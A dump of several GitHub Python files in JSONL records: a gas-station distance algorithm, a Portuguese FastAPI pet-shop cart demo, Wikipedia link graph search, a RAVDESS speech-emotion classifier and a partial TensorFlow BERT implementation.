pq[0][0] * (-1)\n\n def numberOfGasStationsRequired(self, dist: int):\n cnt: int = 0\n for i in range(1, self.n):\n numberInBetween = (self.arr[i] - self.arr[i - 1]) / dist\n if (self.arr[i] - self.arr[i - 1]) == (dist * numberInBetween):\n numberInBetween -= 1\n cnt += numberInBetween\n return cnt\n\n def minimize_max_distance_optimal(self, k: int):\n low = 0\n high = 0\n\n # Find the maximum distance:\n for i in range(self.n - 1):\n high = max(high, self.arr[i + 1] - self.arr[i])\n\n # Apply Binary search:\n diff = 1e-6\n while high - low > diff:\n mid = (low + high) / 2.0\n cnt = self.numberOfGasStationsRequired(mid)\n if cnt > k:\n low = mid\n else:\n high = mid\n\n return high\n\n def print_arr(self) -> None:\n print(self.arr, sep=\" \")\n\n\nif __name__ == \"__main__\":\n # arr = [1, 13, 17, 23]\n arr = [1, 2, 3, 4, 5]\n solution = Solution(arr)\n solution.print_arr()\n print(solution.minimize_max_distance(5))\n print(solution.minimize_max_distance_better(5))\n print(type(1e-6))\n print(solution.minimize_max_distance_optimal(5))\n","repo_name":"kamrul-pu/problem-solving","sub_path":"data_structure/min_max_distance_between_gas_station.py","file_name":"min_max_distance_between_gas_station.py","file_ext":"py","file_size_in_byte":3098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23588216479","text":"\nfrom fastapi import FastAPI, HTTPException\n\n\napp = FastAPI()\n\nusuario = [\n {\"nome\": \"Dolly\", \"email\": \"dollyna@gmail.com\", \"id\": 1}\n]\n\nprodutos = [\n {\"item\" : \"petisco\", \"item_id\": 1, \"descricao\": None, \"preco\": 30, \"qty\" : 3},\n {\"item\" : \"ração\", \"item_id\": 2, \"descricao\": None, \"preco\": 210, \"qty\" : 1},\n {\"item\" : \"patê\", \"item_id\": 3, \"descricao\": None, \"preco\": 10, \"qty\" : 5}\n]\n\ncarrinho = [\n {\"user_id\": 3, \"item_id\": 1, \"qty\": 2, \"preco\": 200},\n {\"user_id\": 3, \"item_id\": 2, \"qty\": 5, \"preco\": 100}\n]\n\nendereco = [\n {\"rua\": \"rua da Dolly\", \"cep\": \"1234\", \"cidade\": \"Altinopolis\", \"estado\": \"SP\", \"address_id\": 1, \"user_id\": 1},\n {\"rua\": \"rua da Molly\", \"cep\": \"1234\", \"cidade\": \"Altinopolis\", \"estado\": \"SP\", \"address_id\": 2, \"user_id\": 1}\n]\n\n#---------------------------------------------- Página inicial de saudações --------------------------\n@app.get(\"/\")\nasync def saudacoes():\n site = \"Saudações! Sejam bem-vindas e bem-vindos :)\"\n return site\n\n\n#------------------------------------------------------- Usuario ----------------------------------------------\n@app.post('/create_user/', status_code=201) #criando os usuários \nasync def add_user(user : dict):\n\n for temp_user in usuario:\n if temp_user['nome'] == user['nome']:\n raise HTTPException(status_code=400, detail= f\"{user['nome']} já existe!\")\n\n usuario.append(user)\n \n return f\"{user['nome']} adicionado (a) corretamente!\"\n\n@app.post('/users/{user_id}/endereco/{address_id}', status_code=201) #criando os endereços dos usuários \nasync def add_user_address(user_address : dict) -> dict:\n endereco.append(user_address)\n return f\"Endereço do usuário adicionado corretamente!\"\n\n\n@app.get('/users', status_code=200) #pegando todos usuários cadastrados\nasync def get_users() -> dict:\n return {\"Usuários\": usuario}\n\n@app.get('/users/{user_id}', status_code=200) #pegando um usuario pelo id \nasync def get_users(user_id: int):\n for temp_user in usuario:\n if temp_user['id'] == user_id:\n return f\"Usário com id {user_id} existe\"\n\n raise HTTPException(status_code=404, detail=f\"Usuário com id {user_id} não encontrado!\")\n\n@app.get('/users/name/{user_name}', status_code=200) #pegando um usuario pelo nome\nasync def get_users_name(user_name: str):\n for temp_user in usuario:\n if temp_user['nome'] == user_name:\n return f\"Usuário com nome {user_name} existe\"\n\n raise HTTPException(status_code=404, detail=f\"Usuário com nome {user_name} não encontrado!\")\n\n@app.delete('/delete/{user_id}',status_code=200) #removendo um usuário pelo id\nasync def delete_user(user_id: int):\n for temp_user in usuario:\n if temp_user['id'] == user_id:\n usuario.remove(temp_user)\n return f\"Usuário com id {user_id} corretamente deletado!\"\n\n raise HTTPException(status_code=404, detail=f\"Usuário com id {user_id} não encontrado!\")\n\n@app.get('/users/{user_id}/endereco/{address_id}', status_code=200) #pegando um endereço de usuario\nasync def get_users_address(user_id: int):\n ends = []\n for i in endereco:\n if i['user_id'] == user_id:\n ends.append(i)\n return {\"Endereços do usuário\":ends}\n\n@app.delete('/delete/usuario/{user_id}/endereco/{address_id}',status_code=200) #removendo um endereço de usuário pelo id\nasync def delete_endereco(address_id: int):\n for temp_address in endereco:\n if temp_address['address_id'] == address_id:\n endereco.remove(temp_address)\n return f\"Endereço com id {address_id} corretamento deletado!\"\n\n raise HTTPException(status_code=404, detail=f\"Endereço com id {address_id} não encontrado!\")\n\n\n#----------------------------------------------------- Cadastro de items ---------------------------------------------------------\n@app.post('/create_item', status_code=200) #cadastrando produtos\nasync def register_item(item : dict):\n\n for temp_item in produtos:\n if temp_item['item'] == item['item']:\n raise HTTPException(status_code=400, detail= f\"{item['item']} já registrado!\")\n\n produtos.append(item)\n \n return f\"{item['item']} adicionado corretamente!\"\n\n@app.get('/items', status_code=200) #pegando todos os itens cadastrados\nasync def get_items():\n return {\"Produtos\": produtos}\n\n@app.delete('/delete_item/{item_id}',status_code=200) #removendo um produto pelo código id\nasync def delete_item(item_id:int):\n for temp_item in produtos:\n if temp_item['item_id'] == item_id:\n produtos.remove(temp_item)\n return f\"Item com id {item_id} corretamente deletado!\"\n\n raise HTTPException(status_code=404, detail=f\"Item com id {item_id} não encontrado!\")\n\n\n#------------------------------------------------------ Carrinho de compras ---------------------------------------------------------\n@app.post('/carrinho/{user_id}/{item_id}/', status_code=201) #criando os carrinhos\nasync def add_cart(cart: dict):\n\n for temp_cart in carrinho:\n if temp_cart['user_id'] == cart['user_id']:\n raise HTTPException(status_code=400, detail= f\"Carrinho já existe!\")\n\n carrinho.append(cart)\n \n return f\"Novo carrinho criado!\"\n\n@app.get('/carrinho/{user_id}', status_code=200) #pegando o carrinho de compra associado ao id do usuario \nasync def get_carrinho(user_id: int):\n total = 0\n itens = []\n for i in carrinho:\n if i['user_id'] == user_id:\n total += i['qty'] * i['preco']\n itens.append(i)\n return {\"Carrinho\":itens, \"Preço total\": total}\n\n@app.post('/carrinho/{user_id}/{item_id}', status_code=200) #adicionando produtos ao carrinho\nasync def add_item_to_cart(cart : dict):\n carrinho.append(cart)\n \n return f\"Novo produto adicionado!\"\n\n@app.put('/update_item', status_code=200) #alterando a quantidade dos produtos no carrinho\nasync def update_item(item_id: int, item_quantity:int, user_id: int):\n\n for i in carrinho:\n if i['item_id'] == item_id and i['user_id'] == user_id:\n i['qty'] = item_quantity\n return f\"Item com id {item_id} corretamente modificado!\"\n\n raise HTTPException(status_code=404, detail=f\"Item com id {item_id} não encontrado!\")\n\n@app.delete('/carrinho/{user_id}/delete_item/{item_id}',status_code=200) #removendo um produto pelo código id\nasync def delete_item(user_id: int, item_id: int):\n for temp_item in carrinho:\n if temp_item['item_id'] == item_id and temp_item['user_id'] == user_id:\n carrinho.remove(temp_item)\n return f\"Item {item_id} corretamente deletado!\"\n\n raise HTTPException(status_code=404, detail=f\"Item with id {item_id} não encontrado!\")\n\n\n@app.delete(\"/delete/carrinho/{user_id}/\", status_code=200) #deletando o carrinho de compras \nasync def delete_carrinho(user_id: int):\n for i in carrinho:\n if i['user_id'] == user_id:\n carrinho.remove(i)\n return f\"Carrinho corretamente deletado!\"\n \n raise HTTPException(status_code=404, detail=f\"Usuário não tem carrinho.\")","repo_name":"naomyduarteg/Luiza-code-edicao-5","sub_path":"Projetos/Projeto1_FAST_API/projeto1.py","file_name":"projeto1.py","file_ext":"py","file_size_in_byte":7058,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26331187961","text":"# coding: utf-8\nimport math\nimport read_txt\n\ndef find_name(name):\n \"\"\"\n 探したい単語がpages.txtのなかにあったらそのidを返す関数\n name: 探したい単語(str)\n \"\"\"\n data = read_txt.read_names('wikipedia_links/pages.txt')\n for d in data:\n if d['name'] == name:\n print('Find %s!' % name, end='')\n print('The id is %d.' % d['id'])\n return d['id']\n return None\n\n\ndef bfs(graph, start, end):\n \"\"\"\n start: 探す人のid(int)\n end: 探したい人のid(int)\n \"\"\"\n searched_list = [] # 探索済みリスト\n data = {start: []} # key: node, value: そのnodeに着くまでに辿ったノードのリスト\n queue = [start] # 探索候補\n step = 0 # ステップ数\n while queue:\n current = queue.pop(0) # 現在位置\n if current == end:\n print(start, end='')\n for id in data[current]: # endに着くまでに辿ったノードのリスト\n print('->%d' % id, end='')\n return data[current] \n if current not in searched_list:\n searched_list.append(current)\n if current in graph.keys():\n queue += graph[current]\n if len(graph[current]) > 0:\n for id in graph[current]:\n if not id in data.keys():\n data[id] = data[current] + [current]\n\n\ndef dijkstra(route_map):\n searched_list = [] # 探索済み\n not_searched = list(range(len(route_map))) # 未探索\n distance = [math.inf] * len(route_map)\n distance[0] = 0\n from_list = [0] * len(route_map)\n\n while len(searched_list) != len(route_map):\n v = 0\n minimun = math.inf\n for i in not_searched:\n if distance[i] < minimun: # 最小距離を更新\n v = i\n minimun = distance[i]\n # print(distance)\n searched_list.append(v)\n not_searched.remove(v)\n for i in not_searched:\n d = route_map[v][i]\n if d != 0 and distance[v] + d < distance[i]:\n distance[i] = distance[v] + d\n from_list[i] = v\n current = len(route_map) - 1\n result = [current + 1]\n\n while current != 0:\n current = from_list[current]\n result.append(current + 1)\n result.reverse()\n\n return result\n\n\nif __name__ == \"__main__\":\n start = find_name('Google')\n end = find_name('渋谷')\n link_data = read_txt.read_links('wikipedia_links/links.txt')\n graph = read_txt.graph(link_data)\n bfs(graph, start, end)\n\n","repo_name":"segatomo/STEP","sub_path":"hw4/wiki.py","file_name":"wiki.py","file_ext":"py","file_size_in_byte":2593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9420715380","text":"import os\nimport scipy\nimport pickle\nimport sklearn\nimport speechpy\nimport numpy as np\nimport soundfile as sf\nimport scipy.io.wavfile\nimport matplotlib.pyplot as plt\n\nfrom scipy import io\nfrom sklearn import svm\nfrom visualization import *\nfrom pydub import AudioSegment\nfrom sklearn.svm import LinearSVC\nfrom pydub.utils import make_chunks\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.learning_curve import learning_curve\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import StratifiedKFold\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import accuracy_score, confusion_matrix\n\n__author__ = \"Reza\"\n__copyright__ = \"Md Rezaur Rahman, TUM(Computer Science)\"\n__email__ = \"reza.rahman@tum.de\"\n__maintainer__ = \"Reza\"\n__status__ = \"Dev\"\n\n\nFRAME_SIZE = 16000\nMFCC_LEN = 39\n\n\n# The class for training the classifier\n# Only RAVDESS dataset has been used\n\nroot_folder = os.getcwd()\ndataset_path = os.path.join(root_folder, \"Dataset/RAVDESS/\")\n\n\ndef calc_variance(data):\n N = 10\n mean = np.mean(data)\n sum = 0.0\n for i in range(10):\n sum += abs(data[i] - mean)**2\n s = float(sum/(N-1))\n return s\n\nclass RavdessEmoClassifier():\n def __init__(self):\n self.dataset_folder_path = dataset_path\n self.dataset_class_labels = [\"Neutral\", \"Angry\", \"Happy\", \"Sad\", \"Calm\", \"Fearful\", \"Disgust\", \"Surprised\"]\n #self.dataset_class_labels = [\"Neutral\", \"Angry\", \"Happy\", \"Sad\"] # Label for Berlin DB\n self.max_signal_length = 50000 # Hypertuned for RAVDESS dataset\n\n def show_info(self, aname, a):\n print(\"Array\", aname)\n print(\"shape:\", a.shape)\n print(\"dtype:\", a.dtype)\n print(\"min, max:\", a.min(), a.max())\n\n def extract_mfcc_feature(self):\n mfcc_dataset = []\n dataset_label = []\n\n print(\"dataset_folder_path: \", self.dataset_folder_path)\n print(\"=========== Commencing reading the RAVDESS Dataset ============\")\n for i, directory in enumerate(self.dataset_class_labels):\n cnt = 0\n print(\"The Directory is : \", directory)\n os.chdir(self.dataset_folder_path + \"/\" + directory)\n\n for filename in os.listdir('.'):\n ## The Signal data is returned as a numpy array with a data-type determined from the file.\n data, sample_rate = sf.read(filename)\n #print(\"sample rate: \", sample_rate)\n # Checking whether data channel is stereo or mono\n if type(data[0]).__name__ == 'ndarray':\n signal = data[:, 1]\n else:\n signal = data\n\n # self.show_info(\"data\", signal)\n # The signals are padded if it is less than required\n # Otherwise slice the signals\n signal_len = len(signal)\n pad_length = abs(self.max_signal_length - signal_len)\n pad_remainder = pad_length % 2\n pad_length = int(pad_length / 2)\n\n if (signal_len < self.max_signal_length):\n signal = np.pad(signal, (pad_length, pad_length + pad_remainder), 'constant', constant_values=0)\n else:\n signal = signal[pad_length:pad_length + self.max_signal_length]\n cnt = cnt + 1\n\n ## mfcc_len: Number of mfcc features to take for each frame\n mfcc_len = 39\n #mfcc = speechpy.feature.mfcc(signal, sample_rate, num_cepstral=mfcc_len)\n mfcc = speechpy.feature.mfcc(signal, 32000, num_cepstral=MFCC_LEN)\n mfcc = mfcc.flatten()\n #print(\"len(mfcc) : \", len(mfcc))\n mfcc_dataset.append(mfcc)\n dataset_label.append(i) # Lebelling the mfcc feature\n\n print(\"Number of Samples for training in\", directory, \"directory is : \", cnt)\n\n return mfcc_dataset, dataset_label\n\n def training_feature_visualization(self, mfcc_dataset, dataset_label):\n features_embedding_visualize_3d(mfcc_dataset, dataset_label, root_folder)\n #features_embedding_visualize_2d(mfcc_dataset, dataset_label, root_folder)\n\n def train_test_val_split(self, mfcc_dataset, dataset_label):\n # Only train & test set\n x_train, x_test, y_train, y_test = train_test_split(mfcc_dataset, dataset_label, train_size=0.8, random_state=42)\n return x_train, x_test, y_train, y_test\n\n\n def run_model(self, model_name, x_train, y_train, x_test, y_test):\n model = None\n if model_name == \"SVM_Linear\":\n model = (svm.SVC(kernel='linear'))\n elif model_name == \"LinSVC\":\n model = model = LinearSVC(multi_class='crammer_singer')\n elif model_name == \"SVM_RBF\":\n model = (svm.SVC(kernel='rbf'))\n elif model_name == \"Gauss_NB\":\n model = GaussianNB()\n elif model_name == \"RandomForest\":\n model = RandomForestClassifier(n_estimators=100)\n elif model_name == \"MLP\":\n model = MLPClassifier(activation='logistic', verbose=True, hidden_layer_sizes=(512,), batch_size=32)\n\n clf = model.fit(x_train, y_train)\n y_prediction = model.predict(x_test)\n acc = accuracy_score(y_pred=y_prediction, y_true=y_test)\n return acc\n\n def k_fold_cross_validation(self, mfcc_dataset, dataset_label, model_name):\n print(\"===== Result For Model \", model_name, \" =====\")\n mfcc_dataset = np.array(mfcc_dataset)\n dataset_label = np.array(dataset_label)\n acc_list = []\n # 10-fold cross validation\n n_folds = 10\n skf = StratifiedKFold(n_splits=n_folds, shuffle=True)\n for fold in range(0, n_folds):\n cv_splits = list(skf.split(mfcc_dataset, dataset_label))\n train_indices = cv_splits[fold][0]\n test_indices = cv_splits[fold][1]\n\n #print(len(train_indices))\n #print(\"train indices: \", train_indices)\n #print(len(test_indices))\n #print(\"test indices: \", test_indices)\n\n x_train = mfcc_dataset[train_indices]\n y_train = dataset_label[train_indices]\n\n x_test = mfcc_dataset[test_indices]\n y_test = dataset_label[test_indices]\n accuracy = self.run_model(model_name, x_train, y_train, x_test, y_test)\n acc_list.append(accuracy)\n print(\"The Accuracy score in fold\", str(fold + 1), \"is: \", accuracy)\n\n print(\"Accuracy List : \", acc_list)\n avg_acc = np.mean(acc_list)\n variance = calc_variance(acc_list)\n print(\"Avg acc: \", avg_acc)\n print(\"Variance: \", variance)\n\n def display_metrics(self, y_pred, y_test):\n print(\"The Accuracy score is : \")\n print(accuracy_score(y_pred=y_pred, y_true=y_test))\n print(\"The Confusion Matrix is : \")\n print(confusion_matrix(y_pred=y_pred, y_true=y_test))\n\n def training_with_test_train_split(self, mfcc_dataset, dataset_label, model_name):\n x_train, x_test, y_train, y_test = self.train_test_val_split(mfcc_dataset, dataset_label)\n accuracy = self.run_model(model_name, x_train, y_train, x_test, y_test)\n print(\"The Accuracy score for \", model_name, \" model is: \", accuracy)\n\n\n\nif __name__ == \"__main__\":\n model = RavdessEmoClassifier()\n mfcc_dataset, dataset_label = model.extract_mfcc_feature()\n model.k_fold_cross_validation(mfcc_dataset, dataset_label, \"RandomForest\")\n model.k_fold_cross_validation(mfcc_dataset, dataset_label, \"SVM_Linear\")\n model.k_fold_cross_validation(mfcc_dataset, dataset_label, \"SVM_RBF\")\n model.k_fold_cross_validation(mfcc_dataset, dataset_label, \"Gauss_NB\")\n model.k_fold_cross_validation(mfcc_dataset, dataset_label, \"LinSVC\")\n model.k_fold_cross_validation(mfcc_dataset, dataset_label, \"MLP\")\n\n '''model.training_with_test_train_split(mfcc_dataset, dataset_label, \"RandomForest\")\n model.training_with_test_train_split(mfcc_dataset, dataset_label, \"SVM_Linear\")\n model.training_with_test_train_split(mfcc_dataset, dataset_label, \"SVM_RBF\")\n model.training_with_test_train_split(mfcc_dataset, dataset_label, \"Gauss_NB\")\n model.training_with_test_train_split(mfcc_dataset, dataset_label, \"LinSVC\")\n model.training_with_test_train_split(mfcc_dataset, dataset_label, \"MLP\")'''\n","repo_name":"rezaurrakib/EmoSpeech","sub_path":"model_ravdess.py","file_name":"model_ravdess.py","file_ext":"py","file_size_in_byte":8437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4000491811","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport copy\nimport json\nimport math\nimport six\nimport tensorflow as tf\n\nfrom .utils import tf_utils\n\n\nclass BertConfig(object):\n\n def __init__(self,\n vocab_size,\n hidden_size=768,\n num_hidden_layers=12,\n num_attention_heads=12,\n intermediate_size=3072,\n hidden_act=\"gelu\",\n hidden_dropout_prob=0.1,\n attention_probs_dropout_prob=0.1,\n max_position_embeddings=512,\n type_vocab_size=16,\n initializer_range=0.02,\n backward_compatible=True):\n self.vocab_size = vocab_size\n self.hidden_size = hidden_size\n self.num_hidden_layers = num_hidden_layers\n self.num_attention_heads = num_attention_heads\n self.hidden_act = hidden_act\n self.intermediate_size = intermediate_size\n self.hidden_dropout_prob = hidden_dropout_prob\n self.attention_probs_dropout_prob = attention_probs_dropout_prob\n self.max_position_embeddings = max_position_embeddings\n self.type_vocab_size = type_vocab_size\n self.initializer_range = initializer_range\n self.backward_compatible = backward_compatible\n\n @classmethod\n def from_dict(cls, json_object):\n config = BertConfig(vocab_size=None)\n for (key, value) in six.iteritems(json_object):\n config.__dict__[key] = value\n return config\n\n @classmethod\n def from_json_file(cls, json_file):\n with tf.io.gfile.GFile(json_file, \"r\") as reader:\n text = reader.read()\n return cls.from_dict(json.loads(text))\n\n def to_dict(self):\n output = copy.deepcopy(self.__dict__)\n return output\n\n def to_json_string(self):\n return json.dumps(self.to_dict(), indent=2, sort_keys=True) + \"\\n\"\n\n\ndef get_bert_model(input_word_ids,\n input_mask,\n input_type_ids,\n config=None,\n name=None,\n float_type=tf.float32):\n bert_model_layer = BertModel(config=config, float_type=float_type, name=name)\n pooled_output, sequence_output = bert_model_layer(input_word_ids, input_mask,\n input_type_ids)\n bert_model = tf.keras.Model(\n inputs=[input_word_ids, input_mask, input_type_ids],\n outputs=[pooled_output, sequence_output])\n return bert_model\n\n\nclass BertModel(tf.keras.layers.Layer):\n def __init__(self, config, float_type=tf.float32, **kwargs):\n super(BertModel, self).__init__(**kwargs)\n self.config = (\n BertConfig.from_dict(config)\n if isinstance(config, dict) else copy.deepcopy(config))\n self.float_type = float_type\n\n def build(self, unused_input_shapes):\n self.embedding_lookup = EmbeddingLookup(\n vocab_size=self.config.vocab_size,\n embedding_size=self.config.hidden_size,\n initializer_range=self.config.initializer_range,\n dtype=tf.float32,\n name=\"word_embeddings\")\n self.embedding_postprocessor = EmbeddingPostprocessor(\n use_type_embeddings=True,\n token_type_vocab_size=self.config.type_vocab_size,\n use_position_embeddings=True,\n max_position_embeddings=self.config.max_position_embeddings,\n dropout_prob=self.config.hidden_dropout_prob,\n initializer_range=self.config.initializer_range,\n dtype=tf.float32,\n name=\"embedding_postprocessor\")\n self.encoder = Transformer(\n num_hidden_layers=self.config.num_hidden_layers,\n hidden_size=self.config.hidden_size,\n num_attention_heads=self.config.num_attention_heads,\n intermediate_size=self.config.intermediate_size,\n intermediate_activation=self.config.hidden_act,\n hidden_dropout_prob=self.config.hidden_dropout_prob,\n attention_probs_dropout_prob=self.config.attention_probs_dropout_prob,\n initializer_range=self.config.initializer_range,\n backward_compatible=self.config.backward_compatible,\n float_type=self.float_type,\n name=\"encoder\")\n self.pooler_transform = tf.keras.layers.Dense(\n units=self.config.hidden_size,\n activation=\"tanh\",\n kernel_initializer=get_initializer(self.config.initializer_range),\n name=\"pooler_transform\")\n super(BertModel, self).build(unused_input_shapes)\n\n def __call__(self,\n input_word_ids,\n input_mask=None,\n input_type_ids=None,\n **kwargs):\n inputs = tf_utils.pack_inputs([input_word_ids, input_mask, input_type_ids])\n return super(BertModel, self).__call__(inputs, **kwargs)\n\n def call(self, inputs, mode=\"bert\", **kwargs):\n unpacked_inputs = tf_utils.unpack_inputs(inputs)\n input_word_ids = unpacked_inputs[0]\n input_mask = unpacked_inputs[1]\n input_type_ids = unpacked_inputs[2]\n\n word_embeddings = self.embedding_lookup(input_word_ids)\n embedding_tensor = self.embedding_postprocessor(\n word_embeddings=word_embeddings, token_type_ids=input_type_ids)\n if self.float_type == tf.float16:\n embedding_tensor = tf.cast(embedding_tensor, tf.float16)\n attention_mask = None\n if input_mask is not None:\n attention_mask = create_attention_mask_from_input_mask(\n input_word_ids, input_mask)\n\n if mode == \"encoder\":\n return self.encoder(\n embedding_tensor, attention_mask, return_all_layers=True)\n\n sequence_output = self.encoder(embedding_tensor, attention_mask)\n first_token_tensor = tf.squeeze(sequence_output[:, 0:1, :], axis=1)\n pooled_output = self.pooler_transform(first_token_tensor)\n\n return (pooled_output, sequence_output)\n\n def get_config(self):\n config = {\"config\": self.config.to_dict()}\n base_config = super(BertModel, self).get_config()\n return dict(list(base_config.items()) + list(config.items()))\n\n\nclass EmbeddingLookup(tf.keras.layers.Layer):\n\n def __init__(self,\n vocab_size,\n embedding_size=768,\n initializer_range=0.02,\n **kwargs):\n super(EmbeddingLookup, self).__init__(**kwargs)\n self.vocab_size = vocab_size\n self.embedding_size = embedding_size\n self.initializer_range = initializer_range\n\n def build(self, unused_input_shapes):\n \"\"\"Implements build() for the layer.\"\"\"\n self.embeddings = self.add_weight(\n \"embeddings\",\n shape=[self.vocab_size, self.embedding_size],\n initializer=get_initializer(self.initializer_range),\n dtype=self.dtype)\n super(EmbeddingLookup, self).build(unused_input_shapes)\n\n def call(self, inputs):\n \"\"\"Implements call() for the layer.\"\"\"\n input_shape = tf_utils.get_shape_list(inputs)\n flat_input = tf.reshape(inputs, [-1])\n output = tf.gather(self.embeddings, flat_input)\n output = tf.reshape(output, input_shape + [self.embedding_size])\n return output\n\n\nclass EmbeddingPostprocessor(tf.keras.layers.Layer):\n\n def __init__(self,\n use_type_embeddings=False,\n token_type_vocab_size=None,\n use_position_embeddings=True,\n max_position_embeddings=512,\n dropout_prob=0.0,\n initializer_range=0.02,\n initializer=None,\n **kwargs):\n super(EmbeddingPostprocessor, self).__init__(**kwargs)\n self.use_type_embeddings = use_type_embeddings\n self.token_type_vocab_size = token_type_vocab_size\n self.use_position_embeddings = use_position_embeddings\n self.max_position_embeddings = max_position_embeddings\n self.dropout_prob = dropout_prob\n self.initializer_range = initializer_range\n\n if not initializer:\n self.initializer = get_initializer(self.initializer_range)\n else:\n self.initializer = initializer\n\n if self.use_type_embeddings and not self.token_type_vocab_size:\n raise ValueError(\"If `use_type_embeddings` is True, then \"\n \"`token_type_vocab_size` must be specified.\")\n\n def build(self, input_shapes):\n (word_embeddings_shape, _) = input_shapes\n width = word_embeddings_shape.as_list()[-1]\n self.type_embeddings = None\n if self.use_type_embeddings:\n self.type_embeddings = self.add_weight(\n \"type_embeddings\",\n shape=[self.token_type_vocab_size, width],\n initializer=get_initializer(self.initializer_range),\n dtype=self.dtype)\n\n self.position_embeddings = None\n if self.use_position_embeddings:\n self.position_embeddings = self.add_weight(\n \"position_embeddings\",\n shape=[self.max_position_embeddings, width],\n initializer=get_initializer(self.initializer_range),\n dtype=self.dtype)\n\n self.output_layer_norm = tf.keras.layers.LayerNormalization(\n name=\"layer_norm\", axis=-1, epsilon=1e-12, dtype=tf.float32)\n self.output_dropout = tf.keras.layers.Dropout(rate=self.dropout_prob,\n dtype=tf.float32)\n super(EmbeddingPostprocessor, self).build(input_shapes)\n\n def __call__(self, word_embeddings, token_type_ids=None, **kwargs):\n inputs = tf_utils.pack_inputs([word_embeddings, token_type_ids])\n return super(EmbeddingPostprocessor, self).__call__(inputs, **kwargs)\n\n def call(self, inputs, **kwargs):\n unpacked_inputs = tf_utils.unpack_inputs(inputs)\n word_embeddings = unpacked_inputs[0]\n token_type_ids = unpacked_inputs[1]\n input_shape = tf_utils.get_shape_list(word_embeddings, expected_rank=3)\n batch_size = input_shape[0]\n seq_length = input_shape[1]\n width = input_shape[2]\n\n output = word_embeddings\n if self.use_type_embeddings:\n flat_token_type_ids = tf.reshape(token_type_ids, [-1])\n one_hot_ids = tf.one_hot(\n flat_token_type_ids,\n depth=self.token_type_vocab_size,\n dtype=self.dtype)\n token_type_embeddings = tf.matmul(one_hot_ids, self.type_embeddings)\n token_type_embeddings = tf.reshape(token_type_embeddings,\n [batch_size, seq_length, width])\n output += token_type_embeddings\n\n if self.use_position_embeddings:\n position_embeddings = tf.expand_dims(\n tf.slice(self.position_embeddings, [0, 0], [seq_length, width]),\n axis=0)\n\n output += position_embeddings\n\n output = self.output_layer_norm(output)\n output = self.output_dropout(output,training=kwargs.get('training', False))\n\n return output\n\n\nclass Attention(tf.keras.layers.Layer):\n\n def __init__(self,\n num_attention_heads=12,\n size_per_head=64,\n attention_probs_dropout_prob=0.0,\n initializer_range=0.02,\n backward_compatible=False,\n **kwargs):\n super(Attention, self).__init__(**kwargs)\n self.num_attention_heads = num_attention_heads\n self.size_per_head = size_per_head\n self.attention_probs_dropout_prob = attention_probs_dropout_prob\n self.initializer_range = initializer_range\n self.backward_compatible = backward_compatible\n\n def build(self, unused_input_shapes):\n self.query_dense = self._projection_dense_layer(\"query\")\n self.key_dense = self._projection_dense_layer(\"key\")\n self.value_dense = self._projection_dense_layer(\"value\")\n self.attention_probs_dropout = tf.keras.layers.Dropout(\n rate=self.attention_probs_dropout_prob)\n super(Attention, self).build(unused_input_shapes)\n\n def reshape_to_matrix(self, input_tensor):\n ndims = input_tensor.shape.ndims\n if ndims < 2:\n raise ValueError(\"Input tensor must have at least rank 2.\"\n \"Shape = %s\" % (input_tensor.shape))\n if ndims == 2:\n return input_tensor\n\n width = input_tensor.shape[-1]\n output_tensor = tf.reshape(input_tensor, [-1, width])\n return output_tensor\n\n def __call__(self, from_tensor, to_tensor, attention_mask=None, **kwargs):\n inputs = tf_utils.pack_inputs([from_tensor, to_tensor, attention_mask])\n return super(Attention, self).__call__(inputs, **kwargs)\n\n def call(self, inputs,**kwargs):\n (from_tensor, to_tensor, attention_mask) = tf_utils.unpack_inputs(inputs)\n query_tensor = self.query_dense(from_tensor)\n\n key_tensor = self.key_dense(to_tensor)\n\n value_tensor = self.value_dense(to_tensor)\n\n attention_scores = tf.einsum(\"BTNH,BFNH->BNFT\", key_tensor, query_tensor)\n attention_scores = tf.multiply(attention_scores,\n 1.0 / math.sqrt(float(self.size_per_head)))\n\n if attention_mask is not None:\n attention_mask = tf.expand_dims(attention_mask, axis=[1])\n adder = (1.0 - tf.cast(attention_mask, attention_scores.dtype)) * -10000.0\n\n attention_scores += adder\n\n attention_probs = tf.nn.softmax(attention_scores)\n\n attention_probs = self.attention_probs_dropout(attention_probs,training=kwargs.get('training', False))\n\n context_tensor = tf.einsum(\"BNFT,BTNH->BFNH\", attention_probs, value_tensor)\n\n return context_tensor\n\n def _projection_dense_layer(self, name):\n \"\"\"A helper to define a projection layer.\"\"\"\n return Dense3D(\n num_attention_heads=self.num_attention_heads,\n size_per_head=self.size_per_head,\n kernel_initializer=get_initializer(self.initializer_range),\n output_projection=False,\n backward_compatible=self.backward_compatible,\n name=name)\n\n\nclass Dense3D(tf.keras.layers.Layer):\n def __init__(self,\n num_attention_heads=12,\n size_per_head=72,\n kernel_initializer=None,\n bias_initializer=\"zeros\",\n activation=None,\n use_bias=True,\n output_projection=False,\n backward_compatible=False,\n **kwargs):\n super(Dense3D, self).__init__(**kwargs)\n self.num_attention_heads = num_attention_heads\n self.size_per_head = size_per_head\n self.hidden_size = num_attention_heads * size_per_head\n self.kernel_initializer = kernel_initializer\n self.bias_initializer = bias_initializer\n self.activation = activation\n self.use_bias = use_bias\n self.output_projection = output_projection\n self.backward_compatible = backward_compatible\n\n @property\n def compatible_kernel_shape(self):\n if self.output_projection:\n return [self.hidden_size, self.hidden_size]\n return [self.last_dim, self.hidden_size]\n\n @property\n def compatible_bias_shape(self):\n return [self.hidden_size]\n\n @property\n def kernel_shape(self):\n if self.output_projection:\n return [self.num_attention_heads, self.size_per_head, self.hidden_size]\n return [self.last_dim, self.num_attention_heads, self.size_per_head]\n\n @property\n def bias_shape(self):\n if self.output_projection:\n return [self.hidden_size]\n return [self.num_attention_heads, self.size_per_head]\n\n def build(self, input_shape):\n \"\"\"Implements build() for the layer.\"\"\"\n dtype = tf.as_dtype(self.dtype or tf.keras.backend.floatx())\n if not (dtype.is_floating or dtype.is_complex):\n raise 